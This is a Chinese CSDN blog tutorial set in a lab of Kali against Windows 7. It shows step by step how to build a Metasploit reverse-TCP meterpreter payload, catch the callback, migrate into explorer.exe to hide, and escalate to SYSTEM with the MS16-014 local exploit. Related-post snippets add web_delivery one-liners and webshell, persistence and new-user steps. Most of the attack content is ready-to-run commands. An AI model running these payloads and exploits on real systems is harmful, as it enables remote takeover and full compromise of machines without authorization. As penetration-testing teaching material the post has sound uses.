利用msf实现windows的上线与提权

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量1.6k 收藏 10
点赞数 2
文章标签: 安全 windows kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52049485/article/details/112335234
版权

环境部署

攻击机:Kali ip:192.168.208.138
靶机:Win7(x64) ip:192.168.208.142

Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe

开启监听

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp

设置lhost

set lhost 192.168.208.138

设置lport

set lport 6666

然后运行

exploit

在Win7靶机打开传入的木马,Kali成功上线!
在这里插入图片描述
上线后进行进程迁移(隐藏自己),把进程迁移到explore.exe中,1844为进程的pid

migrate 1844

输入指令查看当前用户权限
在这里插入图片描述

攻击提权

system为Win7最高权限,开始提权!
首先输入background命令将session放到后台
在这里插入图片描述
然后开始执行攻击模块,探索系统存在的漏洞(未修补)

use post/multi/recon/local_exploit_suggester

在这里插入图片描述
将后台的session 1 会话拿出来,执行exp
在这里插入图片描述
在探测出的系统漏洞中选择攻击模块进行提权

set session 1
use exploit/windows/local/ms16_014_wmi_recv_notif
exploit

在这里插入图片描述

在这里插入图片描述

成功提权

通过返回信息说明攻击成功,并返回shell,输入指令查看当前用户权限,发现是system,提权成功!
在这里插入图片描述

豪鬼Akuma
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows靶机_【内网渗透】Windows下的内网传输技术
weixin_39984403的博客
01-26 361
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~掐指一算,好像已经一个月没更新过了...趁着现在不忙(才不是偷懒)赶紧更新一波~今天给大家分享的内容是Windows内网传输技术:有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。一起来看看吧!Part.1FTPFTP环境部署 首先,ftp支持ASCII码传输、也...
利用MSF进行windows 权限提升
gugonggugong的博客
03-18 423
前提:获取shell msf生成payload 设置监听 利用python开启http服务 win7上访问HTTP服务并执行msf.exe文件 查看监听的会话,出现meterpreter表示监听成功 一、 提高程序运行级别 查看当前用户级别 尝试getsystem直接提权,失败 ...
使用MSF进行提权windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 796
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
msf登陆Windows 2
weixin_38167847的博客
06-10 179
使用ms17_010(永恒之蓝)进行攻击登陆(XP) 加载模块 ​​​ 连接靶机 ​​​ 设置payload ​​​ 设置lhost(攻击主机IP) ​​​ exploit进行攻击登陆 转载于:https://www.cnblogs.com/qftm/p/10317192.html...
MSF上线
weixin_51151498的博客
03-16 1079
MSF上线
MSF进行windows提权
m0_51822230的博客
05-25 687
主要思路 1.拿到webshell 2.上传大马 3.利用meterpreter模块生成payload 4.本地进行监听 5.进行提权 6.进行维权 7.生成新用户,连接3389 一、本地监听端口 ①.生成payload msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe ②.上传123.exe 这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可) ③.m
msf windows提权方法总结
qq_45951598的博客
06-18 2796
简介 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等 1.getsystem 这里使用getsystem命令试一下,运气好的话可能就提到了system 2.bypassuac 内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url...  msfpayload windows/meterpret
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
6. **有效负载与payloads**:Metasploit中的payloads是利用成功后的后续代码,可以实现诸如控制系统、收集信息、隐藏踪迹等功能。选择合适的payload是成功渗透的关键步骤。 7. **模块系统**:Metasploit包含大量的...
通信与网络中的MSF基于组件的业务框架
11-14
MSF(Microsoft Solutions Framework)提出的基于组件的业务框架是一种设计模式,它主要用于通信与网络领域的业务构建。该框架的核心理念是将复杂的业务逻辑分解为可重用的组件,以便更好地管理和扩展业务。框架包括...
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
msf 上线方法
qq_45951598的博客
06-18 1179
首先选中模块 use exploit/multi/script/web_delivery root@kali:~# msfconsole msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/x64/meterpreter/revers
使用msfvenom 对windows 7 shell
weixin_68281676的博客
09-03 502
windows提权
WMI远程命令执行上线msf
SheXinK’s Blog
11-09 1596
WMI命令执行与Certutil.exe上线msf1 测试环境2 Certutil.exe下载2.1 生成Payload2.2 搭建下载环境2.3 下载Payload方法一:powershell下载方法二:certutil.exe下载3 上线msf3.1 Kali运行监听3.2 远程执行Payload 1 测试环境 攻击机Kali:192.168.11.131 靶机Server2008:192.1...
windows7获取会话后的提权操作
weixin_43893278的博客
09-18 316
利用kaliwindows7进行提权
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 9214
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
windows反射dll加载并结合msf上线
Shanfenglan's blog
07-05 1143
文章目录1.常规调用1.1 写一个dll文件1.2 调用刚写的dll2. 使用MemoryModule的方法调用: 1.常规调用 逻辑: 1. 利用loadlibrary函数将dll文件导入。 2. 利用GetProcAddress函数找到dll文件中我们想调用的函数的地址。 3. 调用。 1.1 写一个dll文件 #include <Windows.h> VOID msg(VOID){ MessageBox(NULL,TEXT("Test"),TEXT("Hello"),MB_OK);
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2490
一条命令上线MSF(Metasploit)-web_delivery模块
msf上线Windows
08-20
Windows系统上,可以使用msf框架(Metasploit)来进行上线。通过msf框架,可以实现与被控主机的远程连接。具体的方法可以参考相关的博客文章。其中提到了使用web_delivery模块,可以通过一条powershell命令直接上线msf,并与被控主机建立连接。这样可以方便地进行后渗透操作和权限提升。如果你在实战中getshell了但权限较低,不知道下一步该怎么做,可以参考相关的博客文章,了解更多关于msf和权限提升的技巧和方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [msf windows版](https://download.csdn.net/download/baidu_35488871/12879062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [一条命令上线MSF(Metasploit)-web_delivery模块](https://blog.csdn.net/weixin_43847838/article/details/127623761)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值